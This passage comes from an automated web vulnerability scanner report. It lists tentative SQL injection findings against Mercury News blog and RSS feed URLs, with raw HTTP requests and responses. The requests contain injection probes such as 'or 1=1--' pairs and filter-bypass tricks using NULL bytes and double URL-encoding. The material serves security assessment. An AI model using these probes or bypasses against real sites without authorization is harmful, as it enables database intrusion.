Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 301 Moved Permanently
Date: Tue, 07 Dec 2010 23:12:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/aei/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:12:27 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Location: http://blogs.mercurynews.com/aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 84


<!-- Page not cached by WP Super Cache. No closing HTML tag. Check your theme. -->

1.3. http://blogs.mercurynews.com/aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 53405733%20or%201%3d1--%20 and 53405733%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/?153405733%20or%201%3d1--%20=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:09:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:09:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title>Database Error</title>

</head>
<body>
   <h1>Error establishing a database connection</h1>
</body>
</html>

Request 2

GET /aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/?153405733%20or%201%3d2--%20=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:09:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/aei/xmlrpc.php
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 35229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />



<title>Charlie Brown vs. The Grinch; Round 3 of our Holiday TV Tourney has started; Vote now! | A+E Interactive</title>

<meta name="generator" content="WordPress" />
<link rel="alternate" type="application/rss+xml" title="A+E Interactive &raquo; Charlie Brown vs. The Grinch; Round 3 of our Holiday TV Tourney has started; Vote now! Comments Feed" href="http://blogs.mercurynews.com/aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/feed/" />
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://blogs.mercurynews.com/aei/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://blogs.mercurynews.com/aei/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://blogs.mercurynews.com/aei/wp-includes/wlwmanifest.xml" />
<link rel='index' title='A+E Interactive' href='http://blogs.mercurynews.com/aei' />
<link rel='start' title='A massive mea culpa and apology for a bad Mass Effect review' href='http://blogs.mercurynews.com/aei/2008/01/01/a_massive_mea_culpa_and_apology_for_a_bad_mass_effect_review/' />
<link rel='prev' title='Review: Leonard Cohen in Oakland' href='http://blogs.mercurynews.com/aei/2010/12/07/review-leonard-cohen-in-oakland/' />
<meta name="generator" content="WordPress 2.8.4" />
<meta name="descrip
...[SNIP]...

1.4. http://blogs.mercurynews.com/extrabaggs/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /extrabaggs/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /extrabaggs/?1%00'=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:08:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:08:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-
...[SNIP]...

Request 2

GET /extrabaggs/?1%00''=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:08:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/extrabaggs/xmlrpc.php
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 51759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://
...[SNIP]...

1.5. http://blogs.mercurynews.com/extrabaggs/2010/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /extrabaggs/2010/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /extrabaggs/2010'/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:12:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:12:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-
...[SNIP]...

Request 2

GET /extrabaggs/2010''/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:12:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/extrabaggs/xmlrpc.php
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 26467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://
...[SNIP]...

1.6. http://blogs.mercurynews.com/extrabaggs/2010/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/feed/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /extrabaggs/2010/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/feed/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /extrabaggs/2010'/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/feed/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:12:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:12:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-
...[SNIP]...

Request 2

GET /extrabaggs/2010''/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/feed/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:12:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/extrabaggs/xmlrpc.php
Last-Modified: Tue, 07 Dec 2010 22:11:32 GMT
ETag: "069f2646a14ec4ebda36831859212c47"
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/xml; charset=UTF-8
Content-Length: 960

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:atom="http://www.w3.org/2005/Atom
...[SNIP]...

1.7. http://blogs.mercurynews.com/kawakami/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /kawakami/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /kawakami%2527/?p=9831 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:13:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:13:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-
...[SNIP]...

Request 2

GET /kawakami%2527%2527/?p=9831 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 07 Dec 2010 23:13:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:13:15 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 7611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...

1.8. http://blogs.mercurynews.com/sharks/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /sharks/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /sharks/?1%2527=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:09:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:09:07 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-
...[SNIP]...

Request 2

GET /sharks/?1%2527%2527=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:09:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/sharks/xmlrpc.php
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 54200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://
...[SNIP]...

1.9. http://blogs.mercurynews.com/sharks/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /sharks/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sharks/?p=4471&1%20and%201%3d1--%20=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:11:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:11:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title>Database Error</title>

</head>
<body>
   <h1>Error establishing a database connection</h1>
</body>
</html>

Request 2

GET /sharks/?p=4471&1%20and%201%3d2--%20=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:11:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/sharks/xmlrpc.php
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 54578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />



<title>Which goalie gets the start against Flyers? Maybe not as easy a call after 5-2 victory over Red Wings | Working the Corners</title>

<meta name="generator" content="WordPress" />
<link rel="alternate" type="application/rss+xml" title="Working the Corners &raquo; Which goalie gets the start against Flyers? Maybe not as easy a call after 5-2 victory over Red Wings Comments Feed" href="http://blogs.mercurynews.com/sharks/2010/12/07/so-which-goalie-gets-the-start-against-flyers-may-not-be-an-easy-call-after-win-over-red-wings/feed/" />
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://blogs.mercurynews.com/sharks/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://blogs.mercurynews.com/sharks/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://blogs.mercurynews.com/sharks/wp-includes/wlwmanifest.xml" />
<link rel='index' title='Working the Corners' href='http://blogs.mercurynews.com/sharks' />
<link rel='start' title='Finding teal connections in Prague' href='http://blogs.mercurynews.com/sharks/2007/09/24/finding-teal-connections-in-prague/' />
<link rel='prev' title='Talk about your turnaround &#8212; Sharks get revenge against Detroit, but coach still unhappy over start' href='http://blogs.mercurynews.com/sharks/2010/12/06/4464/' />
...[SNIP]...

1.10. http://blogs.mercurynews.com/warriors/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /warriors/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /warriors/?p=1744 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:13:53 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 07 Dec 2010 23:09:52 GMT
ETag: "3ee0ec-4e85d-1a1d3000"
Accept-Ranges: bytes
Content-Length: 321629
Cache-Control: max-age=300, must-revalidate
Expires: Tue, 07 Dec 2010 23:18:53 GMT
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://
...[SNIP]...
e things and, in fact, you can usually get signals that the coach is if he sits a player, other than to rest. Our lack of depth, especially a guard, makes that tough to do. But Smart does it when the errors are too much to ignore. Listen to &#8220;neutral&#8221; announcers in nationally telecast games or sometimes even in the other team&#8217;s feed, if you get a half-way honest announcer. You&#8217;ll
...[SNIP]...

Request 2

GET /warriors/?p=1744 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:13:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:13:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-
...[SNIP]...

1.11. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200125.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200125.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200125.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:18:26 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200125.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:26 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.12. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200222.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200222.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200222.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:07 GMT
Date: Tue, 07 Dec 2010 23:20:07 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200222.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:08 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
